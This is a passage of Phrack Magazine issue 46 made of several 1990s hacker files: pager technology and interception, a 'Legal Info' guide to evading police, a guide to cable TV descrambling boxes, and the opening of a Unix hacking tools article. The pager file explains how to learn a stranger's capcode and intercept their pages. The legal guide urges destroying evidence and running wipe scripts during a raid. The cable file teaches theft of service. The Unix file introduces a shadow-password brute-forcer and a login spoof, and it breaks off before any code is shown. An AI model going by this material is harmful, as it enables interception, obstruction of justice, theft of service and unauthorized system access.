Email is probably the single coolest thing to have sent to your
alpha pager. (Unless you subscribe to about a zillion mailing lists)
Companies like SkyTel and Radiomail give the user an email address
that automatically forwards to your paging device.
IE: PIN-NUMBER@skymail.com. Several packages exist for forwarding
email from a UNIX system by sending stripping down the email to
pertinent info such as FROM and SUBJECT lines, and executing a script
to send the incoming mail out via a pager terminal data port.
One such program is IXOBEEPER, which can be found with an archie
query.
Radiomail's founder, (and rather famous ex-hacker in his own right - go
look at ancient ComputerWorld headlines), Geoff Goodfellow had devised
such a method back in the late 70's. His program watched for incoming
email, parsed the mail headers, and redirected the FROM and SUBJECT
lines to his alphanumeric pager. Obviously, not many people had
alphanumeric pagers at all, much less email addresses on ARPANET
back in the 70's, so Geoff's email pager idea didn't see much
wide-spread use until much later.
Two RFC's have been issued recently regarding paging and the Internet.
RFC 1568, the Simple Network Paging Protocol, acts similarly to SMTP.
Upon connecting to the SNPP port the user issues commands such as:
PAGE followed by pager telephone number
MESS followed by the alpha or numeric message
SEND
& QUIT
RFC 1568 has met with some opposition in the IETF, who don't consider
it worthwhile to implement a new protocol to handle paging, since it
can be handled easily using other methods.
The other RFC, number 1569, suggests that paging be addressed in a rather
unique manner. Using the domain TPC.INT, which would be reserved for
services that necessitate the direct connection to The Phone Company,
individual pagers would be addressed by their individual phone numbers.
Usernames would be limited to pager-alpha or pager-numeric to represent
the type of pager being addressed. For example, an alpha-page being sent to
1-800-555-1212 would be sent as pager-alpha@2.1.2.1.5.5.5.0.0.8.1.tcp.int.
** PAGING TERMINAL DATA PORTS **
Many services offer modem connections to pager terminals so that
computer users can send pages from their desks using software packages
like WinBeep, Notify! or Messenger. All of these services connect to
the pager terminal and speak to it using a protocol known as
IXO.
Upon connection, a pager terminal identifies itself with the following:
ID=
(I bet you always wondered what the hell those systems were)
Paging terminals default to 300 E71, although many larger companies
now have dialups supporting up to 2400.
Many such systems allow you to manually enter in the appropriate information
by typing a capital "M" and a return at the ID= prompt. The system will then
prompt you for the PIN of the party you wish to page, followed by a prompt
for the message you wish to send, followed by a final prompt asking if you
wish to send more pages. Not every pager terminal will support a manual
entry, but most do.
All terminals support the IXO protocol. As there are far too many
site specific examples within the breadth of IXO, we will concentrate on
the most common type of pager services for our examples.
[ Sample IXO transaction of a program sending the message ABC to PIN 123
gleened from the IXOBeeper Docs ]
Pager Terminal YOU
--------------------------------------------------------------
<CR>
ID=
<ESC>PG1<CR>
Processing - Please Wait
<CR>
<CR>
ACK <CR>
<ESC>[p <CR>
<STX>123<CR>
ABC<CR>
<ETX>17;<CR>
<CR>
ACK <CR>
<EOT><CR>
<ESC>EOT <CR>
The checksum data came from:
STX 000 0010
1 011 0001
2 011 0010
3 001 0011
<CR> 000 1101
A 100 0001
B 100 0010
C 100 0011
<CR> 000 1101
ETX 000 0011
----------------
1 0111 1011
----------------
1 7 ; Get it? Get an ASCII chart and it will all make sense.
Note: Everything in the paging blocks, from STX to ETX inclusive are used
to generate the checksum. Also, this is binary data, guys...you can't
just type at the ID= prompt and expect to have it recognized as IXO.
It wants specific BITS. Got it? Just checking...
** PAGER FREQUENCIES - US **
[Frequencies transmitting pager information are extremely easy to
identify while scanning. They identify each batch transmission
with a two-tone signal, followed by bursts of data. People with
scanners may tune into some of the following frequencies to
familiarize themselves with this distinct audio.]
Voice Pager Ranges: 152.01 - 152.21
453.025 - 453.125
454.025 - 454.65
462.75 - 462.925
Other Paging Ranges: 35.02 - 35.68
43.20 - 43.68
152.51 - 152.84
157.77 - 158.07
158.49 - 158.64
459.025 - 459.625
929.0125 - 931.9875
** PAGER FREQUENCIES - WORLD **
Austria 162.050 - 162.075 T,N,A
Australia 148.100 - 166.540 T,N,A
411.500 - 511.500 T,N,A
Canada 929.025 - 931-975 T,N,A
138.025 - 173.975 T,N,A
406.025 - 511.975 T,N,A
China 152.000 - 172.575 N,A
Denmark 469.750 N,A
Finland 450.225 T,N,A
146.275 - 146.325 T,N,A
France 466.025 - 466.075 T,N,A
Germany 465.970 - 466.075 T,N,A
173.200 T,N,A
Hong Kong 172.525 N,A
280.0875 T,N,A
Indonesia 151.175 - 153.050 A
Ireland 153.000 - 153.825 T,N,A
Italy 466.075 T,N,A
161.175 T,N
Japan 278.1625 - 283.8875 T,N
Korea 146.320 - 173.320 T,N,A
Malaysia 152.175 - 172.525 N,A,V
931.9375 N,A
Netherlands 156.9865 - 164.350 T,N,A
New Zealand 157.925 - 158.050 T,N,A
Norway 148.050 - 169.850 T,N,A
Singapore 161.450 N,A
931.9375 N,A
Sweden 169.8 T,N,A
Switzerland 149.5 T,N,A
Taiwan 166.775 N,A
280.9375 N,A
Thailand 450.525 N,A
172.525 - 173.475 N,A
UK 138.150 - 153.275 T,N,A
454.675 - 466.075 T,N,A
T = Tone
N = Numeric
A = Alphanumeric
V = Voice
** INTERCEPTION AND THE LAW **
For many years the interception of pages was not considered an
invasion of privacy because of the limited information provided
by the tone-only pagers in use at the time. In fact, when
Congress passed the Electronic Communications Privacy Act in 1986
tone-only pagers were exempt from its provisions.
According to the ECPA, monitoring of all other types of paging signals,
including voice, is illegal. But, due to this same law, paging
transmissions are considered to have a reasonable expectation to
privacy, and Law Enforcement officials must obtain a proper court
order to intercept them, or have the consent of the subscriber.
To intercept pages, many LE-types will obtain beepers programmed with
the same capcode as their suspect. To do this, they must contact
the paging company and obtain the capcode associated with the person
or phone number they are interested in. However, even enlisting
the assistance of the paging companies often requires following
proper legal procedures (warrants, subpoenas, etc.).
More sophisticated pager-interception devices are sold by a variety
of companies. SWS Security sells a device called the "Beeper Buster"
for about $4000.00. This particular device is scheduled as
a Title III device, so any possession of it by someone outside
a law enforcement agency is a federal crime. Greyson Electronics
sells a package called PageTracker that uses an ICOM R7100
in conjunction with a personal computer to track and decode pager
messages. (Greyson also sells a similar package to decode
AMPS cellular messages from forward and reverse channels called
"CellScope.")
For the average hacker-type, the most realistic and affordable option
is the Universal M-400 decoder. This box is about 400 bucks and
will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never
seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF,
Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX. It
takes audio input from any scanners external speaker jack, and
is probably the best decoder available to the Hacker/HAM for the price.
Output from the M400 shows the capcode followed by T, N or A (tone, numeric
or alpha) ending with the message sent. Universal suggests hooking
the input to the decoder directly to the scanner before any de-emphasis
circuitry, to obtain the true signal. (Many scanners alter the audio
before output for several reasons that aren't really relevant to this
article...they just do. :) )
Obviously, even by viewing the pager data as it streams by is of little
use to anyone without knowing to whom the pager belongs to. Law Enforcement
can get a subpoena and obtain the information easily, but anyone else
is stuck trying to social engineer the paging company. One other alternative
works quite well when you already know the individuals pager number,
and need to obtain the capcode (for whatever reason).
Pager companies will buy large blocks in an exchange for their customers.
It is extremely easy to discover the paging company from the phone number
that corresponds to the target pager either through the RBOC or by paging
someone and asking them who their provider is when they return your call.
Once the company is known, the frequencies allocated to that company
are registered with the FCC and are public information. Many CD-ROMs
are available with the entire FCC Master Frequency Database.
(Percon sells one for 99 bucks that covers the whole country -
716-386-6015) Libraries and the FCC itself will also have this information
available.
With the frequency set and a decoder running, send a page that will be
incredibly easy to discern from the tidal wave of pages spewing
forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...)
It will eventually scroll by, and presto! How many important people
love to give you their pager number?
** THE FUTURE **
With the advent of new technologies pagers will become even more
present in both our businesses and private lives. Notebook computers
and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards.
Some of these cards have actual screens that allow for use without the
computer, but most require a program to pull message data out. These
cards also have somewhat large storage capacity, so the length of
messages have the option of being fairly large, should the service
provider allow them to be.
With the advent of 8-bit alphanumeric services, users with PCMCIA pagers
can expect to receive usable computer data such as spreadsheet
entries, word processing documents, and of course, GIFs. (Hey, porno
entrepreneurs: beeper-porn! Every day, you get a new gif sent to your
pagecard! Woo Woo. Sad thing is, it would probably sell.)
A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A
Roaming Computer) was one of the first to allow for such broadcasts.
EMBARC makes use of a proprietary Motorola protocol, rather than
POCSAG, so subscribers must make use of either a Motorola NewsStream
pager (with nifty serial cable) or a newer PCMCIA pager. Messages are
sent to (and received by) the user through the use of special client
software.
The software dials into the EMBARC message switch accessed through
AT&T's ACCUNET packet-switched network. The device itself is used
for authentication (most likely its capcode or serial number)
and some oddball protocol is spoken to communicate with the switch.
Once connected, users have the option of sending a page out, or
retrieving pages either too large for the memory of the pager, or
from a list of all messages sent in the last 24 hours, in case the
subscriber had his pager turned off.
Additionally, the devices can be addressed directly via x.400
addresses. (X.400: The CCITT standard that covers email address
far too long to be worth sending anyone mail to.) So essentially,
any EMBARC customer can be contacted from the Internet.
MTEL, the parent company of the huge paging service SkyTel, is
implementing what may be the next generation of paging technologies.
This service, NWN, being administrated by MTEL subsidiary Destineer,
is most often called 2-way paging, but is more accurately Narrowband-PCS.
The network allows for the "pager" to be a transceiver. When a page
arrives, the device receiving the page will automatically send back
an acknowledgment of its completed reception. Devices may also
send back some kind of "canned response" the user programs. An example
might be: "Thanks, I got it!" or "Why on Earth are you eating up my
allocated pages for the month with this crap?"
MTEL's service was awarded a Pioneers Preference by the FCC, which gave them
access to the narrowband PCS spectrum before the auctions. This is a big
deal, and did not go unnoticed by Microsoft. They dumped cash into the
network, and said the devices will be supported by Chicago. (Yeah,
along with every other device on the planet, right? Plug and Pray!)
The network will be layed out almost identically to MTEL's existing paging
network, using dedicated lines to connect towers in an area to a central
satellite up/downlink. One key difference will be the addition of
highly somewhat sensitive receivers on the network, to pick up the ACKs
and replies of the customer units, which will probably broadcast at
about 2 or 3 watts. The most exciting difference will be the
speed at which the network transmits data: 24,000 Kbps. Twenty-four
thousand. (I couldn't believe it either. Not only can you get your
GIFs sent to your pager, but you get them blinding FAST!) The actual
units themselves will most likely look like existing alphanumeric pagers
with possibly a few more buttons, and of course, PCMCIA units will
be available to integrate with computer applications.
Beyond these advancements, other types of services plan on offering
paging like features. CDPD, TDMA & CDMA Digital Cellular and ESMR
all plan on providing a "pager-like" option for their customers.
The mere fact that you can walk into a K-Mart and buy a pager
off a rack would indicate to me that pagers are far to ingrained into
our society, and represent a wireless technology that doesn't scare
or confuse the yokels. Such a technology doesn't ever really go away.
** BIBLIOGRAPHY **
Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_,
p. 8, July, 1994.
O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994.
O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 9 of 28
****************************************************************************
Legal Info
by Szechuan Death
OK. This document applies only to United States citizens: if
you are a citizen of some other fascist country, don't come whining
to me when this doesn't work..... :)
Make no mistake: I'm not a lawyer. I've merely paid
attention and picked up some facts that might be useful to me along
the way. There are three subjects that it pays to have a knowledge
of handy: prescription drugs, medical procedures, and legal facts.
While these may all be boring as hell, they can certainly pull your
ass out of the fire in a pinch.
Standard disclaimer: I make no claims about this document or
facts contained therein. I also make no claims about their legal
authenticity: if you want to be 100% sure, there's a library in
damn near every town, LOOK IT UP!
One more thing: This document is useful for virtually
ANYTHING. It's effectiveness stretches far beyond computer hacking
(although it's worn a bit thin for serious crimes, as every cretin
on Death Row has tried it already.....:)
OK. Let's say, just for the sake of argument, that you've
decided to take a walk along the wild side and do something
illegal. For our purposes, let's say computer hacking (imagine
that). There are many things you can do cover your legal ass,
should your activities come to the attention of any of our various
friendly law-enforcement agencies nationwide.
-- Part 1: Police Mentality
You must understand the police, if you ever want to be able to
thwart them and keep your freedom. Most police, to survive in
their jobs, have developed an "Us vs. Them" attitude, which we
should tolerate (up to a point). They use this attitude to justify
their fascist tactics. "Us" is the police, a brotherhood that
keeps the peace, always does right, and never snitches on each
other, no matter what the cause. "Them" is the rest of the
population. If "They" are not guilty of a specific crime, they
must have done something else, and they're doing their damndest to
avoid getting caught. In addition, many police have cultivated an
attitude similar to that of a 15-year-old high school punk: "I'm
bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc.
Unfortunately, these people have weapons and the authority to
support that attitude. Therefore, if the police come to your
house, be EXTREMELY polite and subservient; now is not the time to
start spouting your opinion about the police state in America
today. Also, DO NOT RESIST THEM IF THEY ARREST YOU. Besides
adding a charge of "Resisting Arrest" and/or "Assaulting an
Officer", it can get very dangerous. The police have been trained
in a number of suspect-control techniques, most of which involve
twisting body parts at unnatural angles. As if this weren't
enough, almost all police carry guns. Start fighting and you'll
get a couple broken bones, torn ligaments, or worse, a few bullet
wounds (possibly fatal). So remember, be very meek. Show them
that you are cowed by their force and their blustering presence,
and this will save you a black eye or two on the way down to the
station (from tripping and falling, of course).
-- Part 2: Hacker's Security
CARDINAL RULE #1: Get rid of the evidence. No evidence = no
case for the prosecutor. The Novice Hacker's Guide from LOD has an
excellent way to put this:
VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law.
It doesn't hurt to store everything encrypted on your hard disk, or
keep your notes buried in the backyard or in the trunk of your car. You
may feel a little funny, but you'll feel a lot funnier when you when you
meet Bruno, your transvestite cellmate who axed his family to death.
Basic hints:
Hide all your essential printouts, or burn them if they're trash
(remember: police need no warrant to search your trash). Encrypt
the files on your hard drive with something nasty, like PGP or RSA.
Use a file-wiper, NOT delete, to get rid of them when you're done.
And WIPE, don't FORMAT, your floppies and other magnetic media
(better still, degauss them). With a little common sense and a bit
of effort, a great deal of legal headaches can be avoided.
-- Part 3A: Polite Entry
Next part. You and your friends are enjoying an evening of
trying to polevault the firewall on whitehouse.com, when suddenly
you hear a knock at the door. Opening the door, you find a member
of the local police force standing outside, asking if he can come
in and ask you some questions. Now, here's where you start to piss
your pants. If you were smart, you'll have arranged something
beforehand where your friends (or, if there ARE no friends present,
an automatic script) are getting rid of the evidence as shown in
part 2. If you have no handy means of destroying the data
(printouts, floppies, tapes, etc.), throw the whole mess into
the bathtub, soak it in lighter fluid, and torch it. It's a
helluva mess to clean up, but nothing compared to latrine duty at
your nearest federal prison.
While the evidence is being destroyed, you're stalling the
police. Ask to see their search warrant and IDs. Mull over each
and every one of them for at least 5 minutes. If they have none,
start screaming about your 4th Amendment rights. Most importantly:
DON'T INVITE THEM IN. They're like vampires: if you let them in,
you're fucked. If they see anything even REMOTELY incriminating,
that constitutes probable cause for a search and they'll be
swarming all over your house like flies on shit. (And guess what!
It's legal, because YOU LET THEM IN!) Now, be aware that this
won't stall them forever: they can simply wait outside the house
and radio in a request for a search warrant, which will probably be
signed by the judge on duty at that time. Remember: "If you're
not willing to be searched, you MUST have something to hide!" If
there are no friends assisting you, as shown above, USE THIS TIME
EFFECTIVELY. When they get the warrant signed, that will be too
late, because you'll have erased/shredded/burned/hidden/etc. all
the incriminating evidence.
-- Part 3B: And Suddenly, The Door Burst In
Now, if the police already have a search warrant, they don't
need to knock on the door. They can simply kick the door down and
waltz in. If you're there at the time, you CAN try and stall them
as shown above, by asking to see their search warrant and IDs.
This may not work now, because they have you cold, hard, and dead
to rights. And, if anything incriminating is in a place where they
can find it, you're fucked, because it WILL be used as evidence.
But this won't happen to you, because you've already put everything
you're not using right at the moment in a safe, HIDDEN, place.
Right?
This leaves the computer. If you hear them kicking the door
in, keep calm, and run a script you've set up beforehand to low-
level-format the drive, wipe all hacking files, encrypt the whole
thing, etc. If there's any printouts or media hanging out, try and
hide them (probably worthless anyway, but worth a try). The name
of the game now is to minimize the damage that can be done to you.
The less hard evidence linking you to the "crime", the less of a
case the prosecutor will have and the better off you'll be.
-- Part 4: The Arrest
Now is the time to kick all your senses into hyper-record
mode. For you to get processed through the system without a hitch,
the arrest has to go perfectly, by the numbers. One small slip and
you're out through a loophole. Now, the police are aware of this
and will be doing their best to see that doesn't happen, but you
may get lucky all the same. First of all: According to the
Miranda Act, the police are REQUIRED BY LAW to read you your rights
and make sure you understand them. Remember EVERY WORD THEY SAY TO
YOU. If they don't say it correctly, you may be able to get off on
a technicality.
CARDINAL RULE #2: You have the right to remain silent.
EXERCISE IT. This cannot be stressed enough. If you need a
reminder, listen to the first part of the Miranda Warning:
"You have the right to remain silent. If you give up that
right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT
OF LAW."
Nice ring to it, hmm? The only words coming out of your mouth
at this point should be "I'd like to speak to my attorney, please"
and, if applicable in your area, "I'd like to make a phone call,
please" (remember the "please's," see part #1 above) Nothing
else. There are tape recorders, video cameras, PLUS the word of a
dozen police officers to back it all up. How's that for an array
of damning evidence against you?
Then, after the ride downtown, you'll be booked and probably
asked a few questions. Say nothing. You're probably pissing your
pants with fear at this point, and may be tempted to roll over on
everyone you ever shook hands with in your whole life, but keep
your calm, and KEEP QUIET. Keep asking for your attorney and/or a
phone call, no matter WHAT threats/deals/etc. they make to you.
Remember, they can't legally interrogate you without your attorney
present. You may also be tempted to show your mettle at this
point, and give them false information, but remember one thing: If
you lie to them, you can be convicted of perjury (a nasty offense
itself). The best policy here is NSA: Never Say Anything.
Remember, you never have to keep track of what you've said, or have
to worry about having it used against you, if you've said NOTHING.
-- Part 5: The Trial
Here, we'll assume you've been arrested, booked, let out on
bail, indicted on X counts of so-and-so, etc. You're now in the
system. CARDINAL RULE #3: Get the best criminal defense attorney
you can afford, preferably one with some background in the crime
you've committed. No, scratch that: make that the best criminal
defense attorney, PERIOD. It's a helluva lot better to spend 5
years working at McDonald's 12 hours a day to pay back your legal
fee, than it is to spend 5 years in the slammer getting pimped out
nightly for a pack of menthols. Also, pay attention during the
trial. Remember, the defense attorney is working for YOU: it's
YOUR life they're deciding, so give him every bit of information
and help you can. You're paying him to sort it out for you, but
you should still keep an eye on things: if, in the middle of a
trial, something happens (you get a killer idea, or want to jump up
and scream "BULLSHIT!"), TELL HIM! It very well might be useful!
Also, have him nitpick every single thing for loopholes,
technicalities, civil rights violations, etc. It's worth it if it
pays off.
Another important thing is to look good. Image is everything.
Although you might prefer to wear heavily stained rock-band T-
shirts, leather jackets, ratty jeans, etc. in real life, that will
be EXTREMELY damning in the eyes of the judge/jury. They say that
clothes make the man, and in this case it's REALLY true: get a
suit, comb/cut your hair, shave, etc. Make yourself look like a
"positively respectable darling" in the eyes of the court! It'll
pay off for you. (hey, it worked for Eric and Lyle Menendez)
-- Part 8: The Prison
If you're here, you're totally fucked. Unless, by divine
intervention, your conviction is overturned on appeal, you'd better
clear up the next 5 years on your calendar. Apparently, you didn't
read closely enough, so read this every day during your long stay
in prison, and you'll be better equipped next time (assuming there
IS a next time..... :)
Remember the cardinal rules: 1) Don't leave evidence around
to be found. 2) KEEP CALM AND KEEP QUIET. 3) Get the best
attorney available. If you remember these, and exercise some common
sense and a lot of caution, you should have no problem handling any
legal problems that come up.
Note: This is intended to be used as a handbook for defense
from minor crimes ONLY (hacking, DWI, etc.) If you're a career
criminal, or you've murdered or raped somebody, you're scum, and at
least have the grace to plead "guilty". Don't waste the tax-
payers' time and money with fancy legal footwork.
Please feel free to add anything or correct this document.
However, if you DO add or correct something, PLEASE make sure it's
true, and PLEASE email me the changes so I can include them in the next
revision of the document. My address is pstlb@acad3.alaska.edu. Happy
hacking to all, and if this helps you avoid getting caught, so much the
better. :)
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 10 of 28
****************************************************************************
/**************************/
/* A Guide to Porno Boxes */
/* by Carl Corey */
/**************************/
Keeping with tradition, and seeing that this is the first article in
Phrack on cable TV descrambling, any illegal box for use in descrambling
cable television signals is now known as a PORNO BOX.
There are many methods that cable companies use to insure that you get
what you pay for - and _only_ what you pay for. Of course, there are
always methods to get 'more than you pay for'. This file will discuss
the most important aspects of these methods, with pointers to more
detailed information, including schematics and resellers of equipment.
Part I. How the cable company keeps you from getting signals
A brief history
---Older Systems---
Most scrambling methods are, in theory, simple. The original method
used to block out signals was the trap method. All traps remove signals
that are sent from the CATV head end (the CATV company's station). The
first method, which is rarely used anymore was the negative trap.
Basically, every point where the line was dropped had these traps, which
removed the pay stations from your signal. If you decided to add a pay
station, the company would come out and remove the trap. This method was
pretty secure - you would provide physical evidence of tampering if you
climbed the pole to remove them or alter them (sticking a pin through
them seemed to work randomly, but could affect other channels, as it
shifts the frequency the trap removes.) This was a very secure system,
but did not allow for PPV or other services, and required a lot of
physical labor (pole-climbers aren't cheap). The only places this is
used anymore is in an old apartment building, as one trip can service
several programming changes. Look for a big gray box in the basement
with a lot of coax going out. If you are going to give yourself free
service, give some random others free service to hide the trail.
The next method used was termed a positive trap. With this method, the
cable company sends a _very_ strong signal above the real signal. A
tuner sees the strong signal, and locks onto the 'garbage' signal. A
loud beeping and static lines would show up on the set. For the CATV
company to enable a station, they put a 'positive' trap on the line,
which (despite the name) removes the garbage signal. Many text files
have been around on how to descramble this method (overlooking the
obvious, buying a (cheap) notch filter), ranging from making a crude
variable trap, to adding wires to the cable signal randomly to remove the
signal. This system is hardly used anymore, as you could just put a trap
inside your house, which wouldn't be noticed outside the house.
---Current Systems---
The next advent in technology was the box. The discussion of different
boxes follows, but there is one rather new technology which should be
discussed with the traps. The addressable trap is the CATV's dream. It
combines the best features of the negative trap (very difficult to tamper
with without leaving evidence) with features of addressable boxes (no
lineman needs to go out to add a service, computers can process Pay Per
View or other services). Basically, a 'smart trap' sits on the pole and
removes signals at will. Many systems require a small amp inside the
house, which the cable company uses to make sure that you don't hook up
more than one TV. I believe that the new CATV act makes this illegal,
and that a customer does not have to pay for any extra sets (which do not
need equipment) in the house. Of course, we all know that the cable TV
company will do whatever it wants until it is threatened with lawsuits.
Cable boxes use many different methods of descrambling. Most are not in
use anymore, with a few still around, and a few around the corner in the
future. The big thing to remember is sync suppression. This method is
how the cable companies make the picture look like a really fucked up,
waving Dali painting. Presently the most popular method is the Tri-mode
In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10
dB. The sync can be changed randomly once per field, and the information
necessary for the box to rebuild a sync signal. This very common system
is discussed in Radio-Electronics magazine in the 2/87 issue. There are
schematics and much more detailed theory than is provided here.
The other common method currently used is SSAVI, which is most common on
Zenith boxes. It stands for Sync Suppression And Video Inversion. In
addition to sync suppression, it uses video inversion to also 'scramble'
the video. There is no sync signal transmitted separately (or reference
signal to tell the box how to de-scramble) as the first 26 lines (blank,
above the picture) are not de-synched, and can be re-synched with a
phased lock loop - giving sync to the whole field. The data on inversion
is sent somewhere in the 20 or 21st line, which is outside of the
screen. Audio can be scrambled too, but it is actually just moved to a
different frequency. Radio Electronics August 92 on has circuits and
other info in the Drawing Board column.
---Future Systems-
For Pioneer, the future is now. The system the new Pioneers use is
patented and Pioneer doesn't want you to know how it works. From the
patent, it appears to use combinations of in-band, out-band, and keys
(also sending false keys) to scramble and relay info necessary to
descramble. These boxes are damn slick. The relevant patents are US
#5,113,411 and US #4,149,158 if you care to look. There is not much
information to be gained from them. Look for future updates to this
article with info on the system if I can find any :)
Other systems are the VideoCipher + (used on satellites now - this is
scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are
similar, with Digi encrypting the video with DES also (yikes)... And
they all use changing keys and other methods. Oak Sigma converters use
similar methods which are available now on cable. (digital encryption of
audio, etc...)
Part II. How the cable company catches you getting those signals
There are many methods the CATV company can use to catch you, or at
least keep you from using certain methods.
Market Code: Almost _all_ addressable decoders now use a market code.
This is part of the serial number (which is used for pay
per view addressing) which decodes to a general geographic
region. Most boxes contain code which tell it to shut
down if it receives a code (which can be going to any box
on the cable system) which is from a different market area.
So if you buy a converter that is say, market-coded for
Los Angeles, you won't be able to use it in New York.
Bullets: The bullet is a shut down code like above - it will make
your box say 'bAh' and die. The method used most is for
the head end to send messages to every box they know of
saying 'ignore the next shutdown message' ... and once
every (legit) box has this info, it sends the bullet.
The only boxes that actually process the bullet are ones
which the CATV system doesn't know about. P.S. Don't
call the cable company and complain about cable if you
are using an illegal converter - and be sure to warn
anyone you live with about calling the CATV co. also.
Leak Detection: The FCC forces all cable companies to drive around and
look for leaks - any poor splice jobs (wiring your house
from a neighbors without sealing it up nice) and some
descramblers will emit RF. So while the CATV is looking
for the leaks, they may catch you.
Free T-Shirts: The cable company can, with most boxes, tell the box to
display a different signal. So they can tell every box
they know of (the legit box pool) to display a commercial
on another channel, while the pirate boxes get this real
cool ad with an 1800 number for free t-shirts... you call,
you get busted. This is mostly done during PPV boxing or
other events which are paid for - as the company knows
exactly who should get that signal, and can catch even
legit boxes which are modified to receive the fight.
Your Pals: Programs like "Turn in a cable pirate and get $100" let
you know who your friends _really_ are.
Part III: How to get away with it.
I get a lot of questions about opening a box that you own. This is not
a good idea. Most, if not ALL boxes today have a tamper sensor. If you
open the box, you break a tab, flip a switch, etc... This disables the
box and leaves a nice piece of evidence for the CATV co. to show that you
played with it.
I also have had questions about the old "unplug the box when it is
enabled, then plug it back in later"... The CATV company periodically
sends a signal to update all the boxes to where they should be. If you
want to do this, you'll need to find out where the CATV sends the address
information, and then you need to trap it out of the signal. So as soon
as the fraudulent customer (let's call him Chris) sees his box get the
signal to receive the PPV porn channel, he installs the trap and now his
box will never get any pay per view signals again... but he'll always
have whatever he was viewing at the time he put the trap in. Big problem
here is that most _newer_ systems also tell the box how long it can
descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3
hours have passed"...
Where to make/buy/get porno boxes:
You can order a box which has been modified not to accept bullets. This
method is pretty expensive. You can also get a 'pan' descrambler - it is
a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and
descrambles it. These boxes can't be killed by the bullets, and work
pretty well. There are some pans which are made by the same company as
your cable box and are sensitive to bullets, so beware.
There are two basic ideas for modifying a box (provided you get detailed
instructions on how to get it open, or how to fix it once you open it).
You can change the S/N to something which is known as 'universal' or
disassemble the code and remove the jump to the shutdown code.
The universal codes are rare, and may be extinct. Besides, if the cable
company finds out your code, they can nuke it. This happens when someone
who makes (err made) 'universal' chips gets busted. The modification of
the actual code is the best way to do it, just forcing a positive
response to permission checks is the easiest way.
A 'cube' is not a NeXT, it's a device which removes the data signal from
the cable line, and inserts a 'nice' data signal which tells your box to
turn everything on. A 'destructive' cube actually re-programs all the
boxes below it to a new serial number and gives that number full
privileges, while a 'non-destructive' cube needs to know your boxes
serial number, so it can tell your box (without modifications) that it
can view everything. You have to get a new IC if you change boxes, but
the plus is that you can remove the cube and the box functions as
normal. Then again, you have to trust the place you are ordering the
cube from to not be working for the cable company, as you have to give
them your box serial number - which the CATV cable has in their records.
Cubes have been seen for sale in the back of Electronics Now (formerly
Radio Electronics).
Of course, you could check in the above mentioned articles and build
circuitry, it would be a lot cheaper. The only problem is that you have
to be good enough not to fuck it up - TV signals are very easy to fuck up.
Then there is the HOLY GRAIL. Most scrambling systems mess with the sync
pulse. This pulse is followed by the colorburst signal on NTSC video.
Basically, the grail finds the colorburst and uses it as a reference
signal. In theory, it works wonderfully (but does not fix the video
inversion problems found on SSAVI systems). However, with the sync pulse
whacked, the colorburst method may give weak color or color shifts. The
schematics are in the May 1990 Radio-Electronics. I have also received
email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is
a modified (supposedly higher quality) version of the R-E schematics.
The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and
etched board. A little steep, but not too bad. E-mail the above for
more information.
Anyway, that's all for now. Remember, information (including XXX movies)
wants to be free!
Carl Corey / dEs
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 11 of 28
****************************************************************************
***********************************
* Unix Hacking Tools of the Trade *
* *
* By *
* *
* The Shining/UPi (UK Division) *
***********************************
Disclaimer :
The following text is for educational purposes only and I strongly suggest
that it is not used for malicious purposes....yeah right!
Introduction :
Ok, I decided to release this phile to help out all you guys who wish to
start hacking unix. Although these programs should compile & run
on your system if you follow the instructions I have given, knowing a bit
of C will come in handy if things go wrong. Other docs I suggest you read
are older 'phrack' issues with shooting sharks various articles on unix,
and of course, 'Unix from the ground up' by The Prophet.
This article includes three programs, a SUNOS Brute force Shadow password
file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
Shadow Crack
------------
SUNOS Unix brute force shadow password file cracker
---------------------------------------------------
Well, a while back, I saw an article in phrack which included a brute force
password cracker for unix. This was a nice idea, except that these days
more and more systems are moving towards the shadow password scheme. This,
for those of you who are new to unix, involves storing the actual encrypted
passwords in a different file, usually only accessible to root. A typical
entry from a System V R4 password file looks like this :-
root:x:0:1:Sys. admin:/:/bin/sh
with the actual encrypted password replaced by an 'x' in the /etc/passwd
file. The encrypted password is stored in a file(in the case of sysV)
called /etc/shadow which has roughly the following format :-
root:XyfgFekj95Fpq:::::
this includes the login i.d., the encrypted password, and various other
fields which hold info on password ageing etc...(no entry in the other
fields indicate they are disabled).
Now this was fine as long as we stayed away from system V's, but now a
whole load of other companies have jumped on the bandwagon from IBM (aix)
to Suns SUNOS systems. The system I will be dealing with is SUNOS's
shadowed system. Now, like sysV, SUNOS also have a system whereby the
actual encrypted passwords are stored in a file usually called
/etc/security/passwd.adjunct, and normally this is accessible only by root.
This rules out the use of brute force crackers, like the one in phrack
quite a while back, and also modern day programs like CRACK. A typical
/etc/passwd file entry on shadowed SUNOS systems looks like this :-
root:##root:0:1:System Administrator:/:/bin/csh
with the 'shadow' password file taking roughly the same format as that of
Sys V, usually with some extra fields.
However, we cannot use a program like CRACK, but SUNOS also supplied a
function called pwdauth(), which basically takes two arguments, a login
name and decrypted password, which is then encrypted and compared to the
appropriate entry in the shadow file, thus if it matches, we have a valid
i.d. & password, if not, we don't.
I therefore decided to write a program which would exploit this function,
and could be used to get valid i.d's and passwords even on a shadowed
system!
To my knowledge the use of the pwdauth() function is not logged, but I could
be wrong. I have left it running for a while on the system I use and it has
attracted no attention, and the administrator knows his shit. I have seen
the functions getspwent() and getspwnam() in Sys V to manipulate the
shadow password file, but not a function like pwdauth() that will actually
